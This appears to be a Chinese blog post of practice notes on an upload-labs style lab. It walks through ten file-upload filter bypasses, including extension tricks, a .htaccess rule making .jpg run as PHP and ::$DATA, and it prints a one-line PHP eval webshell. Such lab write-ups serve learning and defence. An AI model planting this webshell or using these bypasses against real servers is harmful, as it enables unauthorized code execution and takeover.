文件上传原理一:练习。

最新推荐文章于 2024-04-27 22:45:22 发布
最新推荐文章于 2024-04-27 22:45:22 发布
阅读量290 收藏 1
点赞数
分类专栏: 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/108261333
版权

1、前段绕过,抓包修改后缀名,

2、文件内容绕过,用图片马,抓包修改后缀绕过

3、黑名单绕过,php已经被限制了,那么我们可以改成phtml抓包绕过

4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg

5、”那么后缀为.jpg文件的图片马就会被当做php文件执行,而且不需要改后缀

6、大小写绕过,抓包后后缀改成.pHP,就可以绕过

7、空格绕过,抓包修改后缀,并在后缀后面加上空格

8、点绕过,抓包修改后缀,并在后缀后面加上点

9、文件流绕过,前提条件,必须是window机器,抓包修改后缀,并在后缀后面加上::$DATA

10、双拼绕过,抓包修改后缀,并在把后缀改成pphphp,这样后端去掉php,还剩下个p和hp组合在一起,又是php

一、前段验证绕过

练习地址:http://59.63.200.79:8016/Pass-01/index.php
在这里插入图片描述
在开始之前,我们还是来判断一下是客户端验证还是服务端验证。
文件上传无非就是两种检测:
一是客户端检测,
二是服务端检测。
判断是哪一种检测也非常简单。我们可以通过抓包来检测。

这里我已经在上一篇的“文件上传原理一”里说过了

这个地址是客户端验证。我们只需要绕过前段JS就可以了。
先做一个一句话木马。然后改成允许的格式,在通过抓包,改成原有的php格式。

------------------------------------------ 一句话木马

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传成功,我们复制下这个文件的路径。
在这里插入图片描述
传参成功。
在这里插入图片描述
我们可以用蚁剑连接一下。
在这里插入图片描述
连接成功。
在这里插入图片描述

二、content-type绕过

http://59.63.200.79:8016/Pass-02/index.php
方法就是在数据包里改上传文件的类型。
在这里插入图片描述
在这里插入图片描述

三、文件头绕过

dd.jpg的内容是

<?php @eval($_REQUEST['a']);?>

先做一个图片马
在这里插入图片描述
上传然后抓包修改成phtml,因为黑名单是php,但是phtml也会当做php文件来解析。

在这里插入图片描述
执行成功。
在这里插入图片描述

4、.htaccess文件绕过

.htaccess内容

AddType application/x-httpd-php .jpg

先上传一张图片马,可以看到,访问是一张图片,
在这里插入图片描述
那么我们再来上传.htaccess文件,先重命名。再上传。
在这里插入图片描述
一刷新,我们就可以看到我们的jpg文件当做PHP文件来执行了。
在这里插入图片描述

5、大小写绕过。

在这里插入图片描述

6、空格绕过

在这里插入图片描述
在这里插入图片描述

7、点绕过

在这里插入图片描述
在这里插入图片描述

8、 ::$DATA(Windows文件流绕过)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

9、构造文件后缀绕过(. .)

假如说我们知道源码,然后发现,先去点,再去空格,然后他这里是没有循环的,说明只会去匹配一次。那么我们就可以多设置几个
PS:最后我试验到可以空格点空格点,也可以点空格点,但是最后就是不能以空格结束
在这里插入图片描述
这里我设置的是:. .
可以看到,以为这里没有用循环,所以最后因为逻辑问题,我们跳过了
在这里插入图片描述

10、双写文件后缀绕过

比如pphphp,那么系统会把中间那个php自动去掉,剩p和hp,然后他们又会自动拼接起来。又是php。
在这里插入图片描述
在这里插入图片描述

樱浅沐冰
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件上传小例子,学习中的练习
09-26
文件上传小例子,很简单,只是我学习当中的一个练习.
WCF流:通过HTTP上传/下载文件
04-08
在客户端,可以通过打开一个流并将其传递给服务端的UploadFile方法来实现文件上传。服务端接收流后,可以将其保存到磁盘上。 ```csharp using (FileStream fileStream = new FileStream("fileToUpload.txt", File...
文件上传练习
weixin_30670925的博客
06-02 69
1、Combine(Path1,fileName)自动判断Path1后边是否有反斜线,没有就自动添加上;2、Server.MapPath里不用考虑,正反斜线的问题,。net引擎会自动处理这个问题。。(路径中的斜线问题) 转载于:https://www.cnblogs.com/xcl461330197/articles/4546326.html...
08-微服务文件上传实战(2105~2106总结与练习)
最新发布
2401_84102653的博客
04-27 1014
定义处理上传请求的Controller对象,例如:@Slf4j//当了类的上面添加了@Slf4J就不用自己创建下面的日志对象了//1.创建文件存储目录(按时间创建-yyyy/MM/dd)//1.1获取当前时间的一个目录//1.2构建目录文件对象if(!//2.给文件起个名字(尽量不重复)//2.1获取原文件后缀//2.2构建新的文件名//3.开始实现文件上传//3.1构建新的文件对象,指向实际上传的文件最终地址。
文件上传练习Upload-lab靶场练习
weixin_51583379的博客
09-15 1142
:$DATA 在Windows的一个特性如果文件名加上+::$DATA之后的数据当成文件流处理,不会检查后缀名,并且保持::之前的文件名。这个时候我们可以试试等价扩展名php2,php3,php4,php5,phps,phtml,用bp抓包试试。我们上传一句话木马试试用bp抓包试试修改,发现居然无法抓包,可以判断是用了前端判断js。复制图片的URL用中国蚁🗡打开,输入上传的值,发现登录成功。发现其中的管理发现Php注意的格式没有被限制,用bp抓包试试。此时我们可以删除里面的对值的判断,查看前端代码。
文件上传练习 —— upload-labs靶场(二)
qq_45653588的博客
07-28 394
0X00 文件上传练习 —— upload-labs靶场(一) 0X01 Pass-8 第八关禁止上传所有可以解析的后缀 我们可以利用Windows系统的文件名特性。文件名最后增加点和空格,写成shell.php. ,上传后保存在Windows系统上的文件名最后的一个.会被去掉,实际上保存的文件名就是shell.php。 成功上传。 0X02 Pass-9 第九关又ban了一堆后缀名 查阅资料得知,这关可以利用Windows文件流特性绕过,文件名改成shell.php::$DATA,上传成功后保存的文
文件上传漏洞练习靶场upload-labs
07-05
Upload-Labs是一个专门用于学习和实践文件上传漏洞的靶场,它包含了各种类型的文件上传漏洞实例,可以帮助用户深入理解这类漏洞的工作原理,并掌握如何进行防范和利用。 在Upload-Labs靶场中,你可以遇到以下几种...
文件上传漏洞来练习靶场报告.zip
04-09
资料中详细介绍了如何在练习文件...总的来说,这个资料提供了一个详细的教程,告诉我们如何在练习文件上传漏洞的靶场上进行操作。通过这个教程,我们可以更好地理解文件上传漏洞的原理,提高我们的安全意识和防御能力。
web文件上传
07-18
在Web开发中,文件上传是一项常见的功能,尤其在社交、电商、协作等应用场景中不可或缺。本项目基于Java Web技术,实现了文件从客户端上传到服务器本地的简单流程,这对于初学者理解Web应用程序的工作原理非常有帮助...
upload上传练习
2301_80489197的博客
01-19 916
做到现在了,我对于upload上传的流程有了我自己的一个习惯:就是先上传一个正常的包,在历史模块中找到并放进重写模块,然后就是尝试,我是先尝试php+数字,然后就是phtml,然后是大小写,其次是.htaccess,再其次是.和空格,以及.和空格的组合,最后就是::$DATA。于是,我又上传了几次,分别是以php3,php.等后缀名的形式上传,结果上传的文件后缀名都是没有php的,所以这可能是把文件后缀名中的php给删了,所以我们要双写php进行绕过。phpinfo()?第七关依然是试出来的,是空格绕过。
upload-labs 上传训练
09-02
转自GitHub,是一个文件上传演练的靶场,练习文件上传思路轻松加愉快,附带源码查看,以及提示
文件上传练习 —— upload-labs靶场(一)
qq_45653588的博客
07-27 1295
0X00 靶场准备 靶场项目地址:https://github.com/c0ny1/upload-labs 下载解压放在PHPstudy的www目录下即可 注意靶机的病毒防护要关了,不然一直上传失败 0X01 Pass-1 上传一个webshell到服务器,选择一个PHP一句话木马文件,上传 提示我们该文件类型不允许上传,应该是前端对文件类型进行了验证。 检查源码,发现表单提交时会触发checkFile函数,然后对我们的文件后缀名进行检查。 对于前端验证,我们有多种方法可进行绕过: ①禁用浏览器Jav
简单操作文件上传实例(文件上传,自动重命名,自动添加文件夹)
飘逸软件技术信息服务网
05-08 1394
前台代码:ASPX@ Page Language="C#" AutoEventWireup="true" CodeFile="Default.aspx.cs" Inherits="Album_Default" %>DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/D
文件上传 01 客户端检测绕过(javascript 检测)
kevinhanser
08-12 2091
本文记录文件上传学习过程,教程为 《Upload Attack Framework V1.0》 文件上传检测 客户端javascript 检测(通常为检测文件扩展名) 服务端MIME 类型检测(检测Content-Type 内容) 服务端目录路径检测(检测跟path 参数相关的内容)、 服务端文件扩展名检测(检测跟文件extension 相关的内容) 服务端文件内容检测(检测内容...
文件上传】绕过总结
weixin_55205599的博客
07-02 2867
hp",判定后缀名存在黑名单,将识别到的php删除,后缀只剩下字符组合php,故此时变为a.php。eg:允许上传.jpg,不允许上传.php,如何绕过传.php一句话木马呢?eg:a.pphphp 从左到右识别,识别第二到第四位的php时,即"p。eg:黑名单过滤中只有".php",没有".php "、“ .php”eg : a.JSP、a.Jsp 、a.jsP、a.jSP等等。eg:"a.php.",黑名单没有对"php."过滤,则绕过。eg: a.php改为 a.php::$data。
文件上传-解析漏洞
懂进攻知防守
07-10 945
文件上传之解析漏洞,帮助我们快速了解解析漏洞的原理
文件上传+CTF题目
unexpectedthing的博客
10-27 2379
文章目录概念:文件上传绕过:1.绕过js代码:2.绕过服务端(MIME类型)3.绕过黑名单绕过白名单图片马文件上传后利用蚁剑进行连接后门 概念: web客户端在上传文件时,没有对上传文件的内容,扩展名等进行过滤。 文件上传绕过: 1.绕过js代码: (1)一般的web网页前端在上传文件时,都会利用js代码对文件的扩展名。也就是说,如果对文件的扩展名进行过滤了,可能是js代码的作用了。 (2)方法:利用火狐的about:config来禁用js代码执行。 先使用可以使用的扩展名进行上传,利用bp抓包,改数据包扩
java 文件上传漏洞_文件上传漏洞(绕过姿势)
weixin_33315077的博客
02-16 4501
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
文件上传1
08-08
文件上传是一种常见的Web安全漏洞,攻击者通过上传恶意文件来获取对目标系统的控制权限。为了学习和测试文件上传漏洞,我们可以安装一个名为upload-labs的靶场。首先,我们需要从GitHub上下载upload-labs并解压缩,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值